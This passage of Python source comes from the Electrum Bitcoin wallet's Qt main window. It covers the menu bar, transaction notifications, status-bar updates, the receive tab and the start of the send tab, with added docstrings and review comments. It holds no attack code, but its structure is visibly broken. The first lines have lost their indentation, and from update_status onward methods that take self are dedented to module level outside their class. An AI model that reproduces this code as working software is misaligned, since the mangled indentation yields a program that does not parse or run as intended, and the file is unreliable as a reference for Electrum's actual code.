self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
    def get_wallet_folder(self):
        """Return the directory containing the current wallet file."""
        return os.path.dirname(os.path.abspath(self.wallet.storage.path))
    def new_wallet(self):
        """Start the new/restore wallet wizard with a fresh default filename
        in the current wallet folder."""
        try:
            wallet_folder = self.get_wallet_folder()
        except FileNotFoundError as e:
            self.show_error(str(e))
            return
        filename = get_new_wallet_name(wallet_folder)
        full_path = os.path.join(wallet_folder, filename)
        self.gui_object.start_new_window(full_path, None)
    def init_menubar(self):
        """Build the File/Wallet/View/Tools/Help menu bar.

        Several actions are stored on self (password_menu, seed_menu,
        import/export entries, ...) so that watching_only_changed() and
        update_buttons_on_seed() can toggle them later.
        """
        menubar = QMenuBar()
        # --- File ---
        file_menu = menubar.addMenu(_("&File"))
        self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
        file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
        file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
        file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
        file_menu.addAction(_("Delete"), self.remove_wallet)
        file_menu.addSeparator()
        file_menu.addAction(_("&Quit"), self.close)
        # --- Wallet ---
        wallet_menu = menubar.addMenu(_("&Wallet"))
        wallet_menu.addAction(_("&Information"), self.show_wallet_info)
        wallet_menu.addSeparator()
        self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
        self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
        self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
        self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
        self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
        self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
        self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
        wallet_menu.addSeparator()
        addresses_menu = wallet_menu.addMenu(_("&Addresses"))
        addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
        labels_menu = wallet_menu.addMenu(_("&Labels"))
        labels_menu.addAction(_("&Import"), self.do_import_labels)
        labels_menu.addAction(_("&Export"), self.do_export_labels)
        history_menu = wallet_menu.addMenu(_("&History"))
        history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
        history_menu.addAction(_("&Summary"), self.history_list.show_summary)
        history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
        history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
        contacts_menu = wallet_menu.addMenu(_("Contacts"))
        contacts_menu.addAction(_("&New"), self.new_contact_dialog)
        contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
        contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
        invoices_menu = wallet_menu.addMenu(_("Invoices"))
        invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
        invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
        requests_menu = wallet_menu.addMenu(_("Requests"))
        requests_menu.addAction(_("Import"), lambda: self.import_requests())
        requests_menu.addAction(_("Export"), lambda: self.export_requests())
        wallet_menu.addSeparator()
        wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
        # --- View (optional-tab toggles) ---
        def add_toggle_action(view_menu, tab):
            is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
            item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
            tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
        view_menu = menubar.addMenu(_("&View"))
        add_toggle_action(view_menu, self.addresses_tab)
        add_toggle_action(view_menu, self.utxo_tab)
        add_toggle_action(view_menu, self.channels_tab)
        add_toggle_action(view_menu, self.contacts_tab)
        add_toggle_action(view_menu, self.console_tab)
        # --- Tools ---
        tools_menu = menubar.addMenu(_("&Tools"))  # type: QMenu
        preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog)  # type: QAction
        if sys.platform == 'darwin':
            # "Settings"/"Preferences" are all reserved keywords in macOS.
            # preferences_action will get picked up based on name (and put into a standardized location,
            # and given a standard reserved hotkey)
            # Hence, this menu item will be at a "uniform location re macOS processes"
            preferences_action.setMenuRole(QAction.PreferencesRole)  # make sure OS recognizes it as preferences
            # Add another preferences item, to also have a "uniform location for Electrum between different OSes"
            tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
        tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
        tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
        tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
        tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
        tools_menu.addSeparator()
        tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
        tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
        tools_menu.addSeparator()
        paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
        raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
        raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
        raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
        raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
        raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
        self.raw_transaction_menu = raw_transaction_menu
        run_hook('init_menubar_tools', self, tools_menu)
        # --- Help ---
        help_menu = menubar.addMenu(_("&Help"))
        help_menu.addAction(_("&About"), self.show_about)
        help_menu.addAction(_("&Check for updates"), self.show_update_check)
        help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
        help_menu.addSeparator()
        help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
        help_menu.addAction(_("&Report Bug"), self.show_report_bug)
        help_menu.addSeparator()
        help_menu.addAction(_("&Donate to server"), self.donate_to_server)
        self.setMenuBar(menubar)
    def donate_to_server(self):
        """Prefill the Send tab with the current server's donation address."""
        d = self.network.get_donation_address()
        if d:
            host = self.network.get_parameters().server.host
            # NOTE(review): the message contains spaces and is not
            # percent-encoded; confirm pay_to_URI tolerates this.
            self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
        else:
            self.show_error(_('No donation address for this server'))
    def show_about(self):
        """Show the standard About dialog."""
        QMessageBox.about(self, "Electrum",
                          (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                           _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
                           _("You do not need to perform regular backups, because your wallet can be "
                              "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                           _("Startup times are instant because it operates in conjunction with high-performance "
                              "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
                           _("Uses icons from the Icons8 icon pack (icons8.com).")))
    def show_update_check(self, version=None):
        # Stored on gui_object so the dialog is not garbage-collected.
        self.gui_object._update_check = UpdateCheck(latest_version=version)
    def show_report_bug(self):
        """Show a rich-text message box pointing users at the issue tracker."""
        msg = ' '.join([
            _("Please report any bugs as issues on github:<br/>"),
            f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
            _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
            _("Try to explain not only what the bug is, but how it occurs.")
        ])
        self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
    def notify_transactions(self):
        """Drain the queue of freshly-seen transactions and announce them via
        the system tray, rate-limited to one notification per 20 seconds and
        suppressed while the wallet is still synchronizing."""
        if self.tx_notification_queue.qsize() == 0:
            return
        if not self.wallet.up_to_date:
            return  # no notifications while syncing
        now = time.time()
        rate_limit = 20  # seconds
        if self.tx_notification_last_time + rate_limit > now:
            return
        self.tx_notification_last_time = now
        self.logger.info("Notifying GUI about new transactions")
        txns = []
        while True:
            try:
                txns.append(self.tx_notification_queue.get_nowait())
            except queue.Empty:
                break
        # Combine the transactions if there are at least three
        if len(txns) >= 3:
            total_amount = 0
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    continue
                total_amount += tx_wallet_delta.delta
            self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                        .format(len(txns), self.format_amount_and_units(total_amount)))
        else:
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    continue
                self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
    def notify(self, message):
        """Show *message* as a tray balloon, preferring the icon overload."""
        if self.tray:
            try:
                # this requires Qt 5.9
                self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
            except TypeError:
                # Older Qt: fall back to the standard-icon overload.
                self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
    def timer_actions(self):
        """Periodic housekeeping driven by the gui_object timer; runs on the
        GUI thread."""
        self.request_list.refresh_status()
        # Note this runs in the GUI thread
        if self.need_update.is_set():
            self.need_update.clear()
            self.update_wallet()
        elif not self.wallet.up_to_date:
            # this updates "synchronizing" progress
            self.update_status()
        # resolve aliases
        # FIXME this is a blocking network call that has a timeout of 5 sec
        self.payto_e.resolve()
        self.notify_transactions()
    def format_amount(self, x, is_diff=False, whitespaces=False):
        """Format a satoshi amount *x* per the user's unit settings."""
        # x is in sats
        return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
    def format_amount_and_units(self, amount):
        """Format a satoshi *amount* with its unit, plus the fiat equivalent
        in parentheses when an exchange rate is available."""
        # amount is in sats
        text = self.config.format_amount_and_units(amount)
        x = self.fx.format_amount_and_units(amount) if self.fx else None
        if text and x:
            text += ' (%s)'%x
        return text
    def format_fee_rate(self, fee_rate):
        # Delegates to config; fee_rate units are whatever config expects.
        return self.config.format_fee_rate(fee_rate)
    def get_decimal_point(self):
        """Decimal point position of the currently selected base unit."""
        return self.config.get_decimal_point()
    def base_unit(self):
        """Name of the currently selected base unit (e.g. BTC/mBTC/sat)."""
        return self.config.get_base_unit()
    def connect_fields(self, window, btc_e, fiat_e, fee_e):
        """Keep a BTC amount edit and its fiat twin in sync.

        Whichever edit the user types into drives the other. The `follows`
        flag breaks the feedback loop: it is set on an edit before writing
        a derived value into it, so the resulting textChanged does nothing.
        """
        def edit_changed(edit):
            if edit.follows:
                # Programmatic update from the other edit; ignore.
                return
            edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
            fiat_e.is_last_edited = (edit == fiat_e)
            amount = edit.get_amount()
            rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
            if rate.is_nan() or amount is None:
                # No usable rate or empty input: clear the derived field(s).
                if edit is fiat_e:
                    btc_e.setText("")
                    if fee_e:
                        fee_e.setText("")
                else:
                    fiat_e.setText("")
            else:
                if edit is fiat_e:
                    btc_e.follows = True
                    btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                    btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    btc_e.follows = False
                    if fee_e:
                        window.update_fee()
                else:
                    fiat_e.follows = True
                    fiat_e.setText(self.fx.ccy_amount_str(
                        amount * Decimal(rate) / COIN, False))
                    fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    fiat_e.follows = False
        btc_e.follows = False
        fiat_e.follows = False
        fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
        btc_e.textChanged.connect(partial(edit_changed, btc_e))
        fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the status-bar text, tray tooltip and network icon.

    Picks one of: offline / synchronizing / lagging / balance summary /
    not connected, based on network and wallet state.
    """
    if not self.wallet:
        return
    if self.network is None:
        text = _("Offline")
        icon = read_QIcon("status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            num_sent, num_answered = self.wallet.get_history_sync_state_details()
            text = ("{} ({}/{})"
                    .format(_("Synchronizing..."), num_answered, num_sent))
            icon = read_QIcon("status_waiting.png")
        elif server_lag > 1:
            # Our server is more than one block behind the local chain tip.
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = read_QIcon("status_lagging%s.png"%fork_str)
        else:
            # Fully synced: show confirmed/unconfirmed/unmatured balances.
            c, u, x = self.wallet.get_balance()
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            if self.wallet.has_lightning():
                l = self.wallet.lnworker.get_balance()
                # U+26A1 is the lightning-bolt glyph.
                text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = read_QIcon("status_connected%s.png"%fork_str)
            else:
                icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
    else:
        if self.network.proxy:
            text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
        else:
            text = _("Not connected")
        icon = read_QIcon("status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    if self.status_button:
        self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar, and refresh the tab views when the wallet
    is synced or there is no usable network connection."""
    self.update_status()
    if self.wallet.up_to_date:
        self.update_tabs()
        return
    if not self.network or not self.network.is_connected():
        self.update_tabs()
def update_tabs(self, wallet=None):
    """Refresh all tab views.  Events for a wallet other than ours are
    ignored; wallet=None means "our wallet"."""
    if wallet is None:
        wallet = self.wallet
    elif wallet != self.wallet:
        return
    self.history_model.refresh('update_tabs')
    for view in (self.request_list, self.address_list, self.utxo_list,
                 self.contact_list, self.invoice_list):
        view.update()
    self.channels_list.update_rows.emit(wallet)
    self.update_completions()
def create_channels_tab(self):
    """Build and return the Lightning channels tab widget."""
    self.channels_list = ChannelsList(self)
    toolbar = self.channels_list.get_toolbar()
    return self.create_list_tab(self.channels_list, toolbar)
def create_history_tab(self):
    """Build and return the history tab: model, list view and toolbar."""
    self.history_model = HistoryModel(self)
    self.history_list = hist_list = HistoryList(self, self.history_model)
    self.history_model.set_view(self.history_list)
    hist_list.searchable_list = hist_list
    toolbar = hist_list.create_toolbar(self.config)
    # Toolbar visibility is a persisted user preference.
    hist_list.show_toolbar(bool(self.config.get('show_toolbar_history', False)))
    return self.create_list_tab(hist_list, toolbar)
def show_address(self, addr):
    """Open the modal address-details dialog for *addr*."""
    from . import address_dialog
    dialog = address_dialog.AddressDialog(self, addr)
    dialog.exec_()
def show_channel(self, channel_id):
    """Open the (non-modal) channel-details dialog for *channel_id*."""
    from . import channel_details
    dialog = channel_details.ChannelDetailsDialog(self, channel_id)
    dialog.show()
def show_transaction(self, tx, *, tx_desc=None):
    '''tx_desc is set only for txs created in the Send tab'''
    # Calls the module-level show_transaction() helper (shadowed by this
    # method name on the instance), passing ourselves as dialog parent.
    show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
    """Open a (non-modal) dialog with the details of a Lightning tx item."""
    from .lightning_tx_dialog import LightningTxDialog
    dialog = LightningTxDialog(self, tx_item)
    dialog.show()
def create_receive_tab(self):
    """Build and return the Receive tab widget.

    Layout: a form grid (description, amount, fiat amount, expiry,
    buttons) on the left, and a tab widget showing address / payment
    request / QR code on the right, with the request list underneath.
    """
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 0, 0)
    grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 1, 0)
    grid.addWidget(self.receive_amount_e, 1, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    # NOTE(review): this wires the *send*-tab fields (amount_e/fiat_send_e),
    # so it appears to assume create_send_tab already ran -- confirm ordering.
    self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
    self.expires_combo = QComboBox()
    # Expiry choices: (seconds, label) pairs sorted by duration.
    evl = sorted(pr_expiration_values.items())
    evl_keys = [i[0] for i in evl]
    evl_values = [i[1] for i in evl]
    default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
    try:
        i = evl_keys.index(default_expiry)
    except ValueError:
        # Configured value not among the presets: fall back to the first.
        i = 0
    self.expires_combo.addItems(evl_values)
    self.expires_combo.setCurrentIndex(i)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    def on_expiry(i):
        # Persist the user's expiry choice.
        self.config.set_key('request_expiry', evl_keys[i])
    self.expires_combo.currentIndexChanged.connect(on_expiry)
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
        _('The bitcoin address never expires and will always be part of this electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
    grid.addWidget(self.expires_combo, 2, 1)
    # Read-only label shown in place of the combo for existing requests.
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 2, 1)
    self.clear_invoice_button = QPushButton(_('Clear'))
    self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
    self.create_invoice_button = QPushButton(_('New Address'))
    self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
    self.create_invoice_button.setToolTip('Create on-chain request')
    self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_invoice_button)
    buttons.addWidget(self.create_invoice_button)
    # With Lightning enabled, add a second button for LN requests.
    if self.wallet.has_lightning():
        self.create_invoice_button.setText(_('New Address'))
        self.create_lightning_invoice_button = QPushButton(_('Lightning'))
        self.create_lightning_invoice_button.setToolTip('Create lightning request')
        self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
        self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
        buttons.addWidget(self.create_lightning_invoice_button)
    grid.addLayout(buttons, 4, 3, 1, 2)
    # Right-hand side: payment-request text, QR widget, address text.
    self.receive_payreq_e = ButtonsTextEdit()
    self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
    self.receive_payreq_e.addCopyButton(self.app)
    self.receive_payreq_e.setReadOnly(True)
    self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
    self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
    self.receive_qr = QRCodeWidget(fixedSize=220)
    # Clicking the QR toggles the floating QR window; hover shows a hand cursor.
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_address_e = ButtonsTextEdit()
    self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
    qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
    qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
    self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
    self.receive_requests_label = QLabel(_('Receive queue'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    receive_tabs = QTabWidget()
    receive_tabs.addTab(self.receive_address_e, _('Address'))
    receive_tabs.addTab(self.receive_payreq_e, _('Request'))
    receive_tabs.addTab(self.receive_qr, _('QR Code'))
    receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
    receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
    # Keep the layout stable when the tab widget is hidden.
    receive_tabs_sp = receive_tabs.sizePolicy()
    receive_tabs_sp.setRetainSizeWhenHidden(True)
    receive_tabs.setSizePolicy(receive_tabs_sp)
    def maybe_hide_receive_tabs():
        # Only show the tabs once there is a payment request to display.
        receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
    self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
    maybe_hide_receive_tabs()
    # layout
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addStretch()
    hbox.addWidget(receive_tabs)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_requests(self, keys):
    """Delete the given payment requests and reset the receive UI."""
    for request_key in keys:
        self.wallet.delete_request(request_key)
    self.request_list.update()
    self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
    """Delete a Lightning invoice and refresh both queues."""
    self.wallet.lnworker.delete_invoice(payreq_key)
    for view in (self.request_list, self.invoice_list):
        view.update()
    self.clear_receive_tab()
def sign_payment_request(self, addr):
    """Sign the payment request for *addr* with the configured alias key.

    Only signs when an alias is configured, its info has been resolved,
    and the alias address belongs to this wallet.  Prompts for the wallet
    password when keystore encryption is enabled; silently does nothing
    otherwise.
    """
    alias = self.config.get('alias')
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    if not password:
                        # User cancelled the password prompt: abort signing.
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(repr(e))
                    return
            else:
                # Alias address is not ours: nothing we can sign with.
                return
def create_invoice(self, is_lightning):
    """Create a receive request (Lightning or on-chain) from the form.

    Reads amount/message/expiry from the receive tab, stores the request,
    selects it in the request list, clears the form and copies the
    invoice/address to the clipboard.
    """
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
    if is_lightning:
        if not self.wallet.lnworker.channels:
            self.show_error(_("You need to open a Lightning channel first."))
            return
        # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
        key = self.wallet.lnworker.add_request(amount, message, expiry)
    else:
        key = self.create_bitcoin_request(amount, message, expiry)
        if not key:
            # User declined one of the confirmation dialogs.
            return
        self.address_list.update()
    assert key is not None
    self.request_list.update()
    self.request_list.select_key(key)
    # clear request fields
    self.receive_amount_e.setText('')
    self.receive_message_e.setText('')
    # copy to clipboard
    r = self.wallet.get_request(key)
    content = r.invoice if r.is_lightning() else r.get_address()
    title = _('Invoice') if is_lightning else _('Address')
    self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
    """Create an on-chain payment request; return its address key.

    Returns None when the user declines address reuse (imported wallets
    out of addresses) or declines creating an address beyond the gap
    limit (deterministic wallets).
    """
    addr = self.wallet.get_unused_address()
    if addr is None:
        if not self.wallet.is_deterministic():  # imported wallet
            msg = [
                _('No more addresses in your wallet.'), ' ',
                _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
                _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
                _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
            ]
            if not self.question(''.join(msg)):
                return
            addr = self.wallet.get_receiving_address()
        else:  # deterministic wallet
            if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
                return
            addr = self.wallet.create_new_address(False)
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req)
    except Exception as e:
        self.logger.exception('Error adding payment request')
        self.show_error(_('Error adding payment request') + ':\n' + repr(e))
    else:
        # Request stored: optionally sign it with the configured alias.
        self.sign_payment_request(addr)
    return addr
def do_copy(self, content: str, *, title: str = None) -> None:
    """Copy *content* to the clipboard and show a confirming tooltip.

    title: optional human-readable name of what was copied (e.g.
    "Invoice", "Address"); used in the tooltip text.
    """
    self.app.clipboard().setText(content)
    if title is None:
        # Fix: the generic message has no placeholder, so the previous
        # stray .format(title) call was a confusing no-op.
        tooltip_text = _("Text copied to clipboard")
    else:
        tooltip_text = _("{} copied to clipboard").format(title)
    QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
    """Reset all receive-tab inputs and selection to their empty state."""
    for text_edit in (self.receive_payreq_e, self.receive_address_e,
                      self.receive_message_e):
        text_edit.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
    self.request_list.clearSelection()
def toggle_qr_window(self):
    """Show/hide the floating QR window, preserving its geometry.

    The window is created lazily on first use; its last geometry is
    saved on hide and restored on show.
    """
    from . import qrwindow
    if not self.qr_window:
        # First use: create the window and remember its initial geometry.
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    else:
        if not self.qr_window.isVisible():
            self.qr_window.setVisible(True)
            self.qr_window.setGeometry(self.qr_window_geometry)
        else:
            # Hiding: stash geometry so the next show restores position.
            self.qr_window_geometry = self.qr_window.geometry()
            self.qr_window.setVisible(False)
    self.update_receive_qr()
def show_send_tab(self):
    """Switch the main tab widget to the Send tab."""
    send_index = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(send_index)
def show_receive_tab(self):
    """Switch the main tab widget to the Receive tab."""
    receive_index = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(receive_index)
def update_receive_qr(self):
    """Re-render the receive QR code(s) from the payment-request text."""
    uri = str(self.receive_payreq_e.text())
    if maybe_extract_bolt11_invoice(uri):
        # encode lightning invoices as uppercase so QR encoding can use
        # alphanumeric mode; resulting in smaller QR codes
        uri = uri.upper()
    self.receive_qr.setData(uri)
    qr_win = self.qr_window
    if qr_win and qr_win.isVisible():
        # Keep the floating QR window in sync as well.
        qr_win.qrw.setData(uri)
def update_receive_address_styling(self):
    """Highlight the receiving address in red when it was used before."""
    addr = str(self.receive_address_e.text())
    reused = is_address(addr) and self.wallet.is_used(addr)
    if reused:
        self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
        self.receive_address_e.setToolTip(_("This address has already been used. "
                                            "For better privacy, do not reuse it for new payments."))
    else:
        self.receive_address_e.setStyleSheet("")
        self.receive_address_e.setToolTip("")
def create_send_tab(self):
    """Build and return the Send tab widget.

    Layout: pay-to / description / amount form grid with Max, Clear,
    Save and Pay buttons, and the invoice ("send queue") list below.
    """
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    self.payto_e.addPasteButton(self.app)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # Auto-completion of contacts in the pay-to field.
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = FreezableLineEdit()
    self.message_e.setMinimumWidth(700)
    grid.addWidget(self.message_e, 2, 1, 1, -1)
